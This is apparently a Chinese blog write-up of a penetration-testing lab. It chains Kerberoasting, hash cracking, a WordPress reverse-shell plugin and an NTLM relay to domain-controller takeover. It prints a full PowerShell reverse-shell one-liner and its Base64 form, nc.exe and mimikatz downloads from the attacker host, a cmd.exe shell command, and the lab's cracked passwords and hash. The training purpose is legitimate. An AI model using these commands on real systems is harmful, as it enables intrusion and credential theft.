BEYOND 公司之滲透測試(3) - 內部進階攻擊

BEYOND 公司之滲透測試(3)

內部進階攻擊


第二階段中當我們瀏覽 BloodHound 時有發現如下圖的枚舉,這意味著 daniela 可能可以成功登入到 INTERNALSRV1 這台機器上




所以直接使用之前學過的 Kerberoasting AD 攻擊來嘗試看看,參考連結如下
https://your-it-note.blogspot.com/2023/11/active-directory_9.html

指令 └─$ proxychains -q impacket-GetUserSPNs -request -dc-ip 172.16.119.240 beyond.com/john

輸入密碼後跟練習的一樣拿到了 daniela 的 HASH



依樣存下來,依據之前練習的一樣直接爆破吧,└─$ sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

順利破解出來了,密碼是 DANIelaRO123




順手記錄好習慣......




使用者都會習慣使用相同的密碼,讓我們先測試 WordPress 網站看看,可以登入且網站僅有他一個帳號並且是管理者權限




既然是管理者那就使用之前用過的外掛方式來拿該伺服器的權限,參考如下

https://your-it-note.blogspot.com/2023/08/sql-injection_25.html

直接安插 Reverse Shell Plugin 套件,做好後直接壓縮 wordpress.php.zip





上傳安裝後也啟動了




結果我們的 nc-9999 沒有進來




後來又嘗試了其他 Port 依然沒有結果,看來是 INTERNALSRV1 無法出外網的樣子

所以讓我們繼續查看 WordPress 上的相關設定,發現一個備份路徑檔

C:\xampp\htdocs\wordpress\wp-content\backup-migration-BV1emzfHrI



該路徑將用於儲存備份。我們可能會濫用此功能來強制對底層系統進行身份驗證。

讓我們在這裡暫停一下併計劃下一步。目前,有兩種有希望的攻擊媒介。

第一個是將惡意 WordPress 外掛程式上傳到 INTERNALSRV1。透過準備並上傳 Web shell 或反向 shell,我們也許能夠獲得底層系統上的程式碼執行,但試過了目前尚未成功。


對於第二個攻擊向量,我們必須再次查看 BloodHound 結果並做出一些假設。正如我們所發現的,本地管理員帳戶在 INTERNALSRV1 上有一個活動會話。根據此會話,我們可以假設此使用者帳戶用於執行 WordPress 實例。

此外,網域中多台電腦的本機管理員帳戶使用相同的密碼設定的情況是人的惰性。我們假設目標環境也是如此。我們也了解到,網域管理員 beccy 在 MAILSRV1 上有一個活動會話,因此該使用者的憑證可能會快取在系統上。


由於 SMB 簽章在 MAILSRV1 和 INTERNALSRV1 上被停用,如果我們可以強制進行身份驗證,則可能會發生中繼攻擊。


最後,我們確定了 WordPress 備份遷移外掛中的備份目錄路徑字段,其中包含備份目標的路徑。這可能允許我們強制執行此類身份驗證請求。


基於所有這些信息,我們來定義第二個攻擊向量的計畫。首先我們將嘗試透過濫用INTERNALSRV1 上備份遷移 WordPress 外掛程式的備份目錄路徑來強制發出身份驗證請求。透過設定 Kali 機器的目標路徑,可以使用 impacket-ntlmrelayx2 將傳入連線中繼到 MAILSRV1。如果我們的假設正確,則驗證請求是在 INTERNALSRV1 上的本機管理員帳戶上下文中發出的,該帳戶與 MAILSRV1 上的本機管理員帳戶具有相同的密碼。


如果此攻擊成功,我們將在 MAILSRV1 上獲得特權程式碼執行,然後我們可以利用它來提取 beccy 的 NTLM 雜湊值,從而滿足滲透測試的主要目標之一。

由於第二個攻擊向量不僅會導致在單一系統上執行程式碼,而且還提供了實現滲透測試目標之一的潛在向量,因此我們將首先執行中繼攻擊。

在修改 WordPress 外掛程式中的備份目錄路徑之前,讓我們先設定 impacket-ntlmrelayx 。我們將使用 --no-http-server 和 -smb2support 來停用 HTTP 伺服器並啟用 SMB2 支援。我們將指定 MAILSRV1 的外部位址 192.168.233.242 為中繼攻擊的目標。透過輸入外部位址,我們不必透過代理鏈代理我們的中繼攻擊。最後我們將對 PowerShell 反向 shell oneliner 3進行 Base64 編碼,它將連接回連接埠 9999 上的 Kali 機器,並將其作為命令提供給參數 -c。

可以參考之前練習的 "中繼(Relaying) Net-NTLMv2",連結如下

https://your-it-note.blogspot.com/2023/09/relaying-net-ntlmv2.html

攻擊前要先做到 oneliner 的 BASE64 reverse shell,文章內有手法都一樣,主要就這一段

$Text = '$client = New-Object System.Net.Sockets.TCPClient("192.168.45.217",9999);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'




轉好的 BASE64 如下

=========================================================================

JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMQA3ACIALAA5ADkAOQA5ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

=========================================================================

接著我們要在攻擊主機啟動 impacket-ntlmrelayx,指令 sudo impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.233.242 -c "powershell -enc JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADQANQAuADIAMQA3ACIALAA5ADkAOQA5ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="





將備份路徑改如下,IP 是 kali 中繼,test 是不存在的路徑



接著按 SAVE,網頁會寫路徑不存在




但去看 ntlm-relay 會發現進來了且成功轉過去 MailSRV1




接著看我們的 nc-9999,連線進來了且 whoami 是本機管理員跟預期的一樣




載 nc.exe 再執行多開一個 shell 到 kali 443

iwr -uri http://192.168.45.217:8000/nc.exe -Outfile nc.exe

wmic process call create "C:\users\administrattor\nc.exe 192.168.45.217 443 -de cmd.exe"




kali 443 Listen 如下圖




下載一定要的 mimikatz,iwr -uri http://192.168.45.217:8000/mimikatz.exe -Outfile mimikatz.exe





標準作業 .\mimikatz.exe,privilege::debug,sekurlsa::logonpasswords




我們最想要的 beccy 網域管理者 NTLM 出現了 f0397ec5af49971f6efbdb07877046b3

注意看下面直接提供了明文密碼 Password : NiftyTopekaDevolve6655!#!




順手記錄好習慣




直接橫向移動測試 DC 吧

proxychains -q impacket-psexec -hashes 00000000000000000000000000000000:f0397ec5af49971f6efbdb07877046b3 beccy@172.16.119.240

拿下 Domain Control 了













留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(0)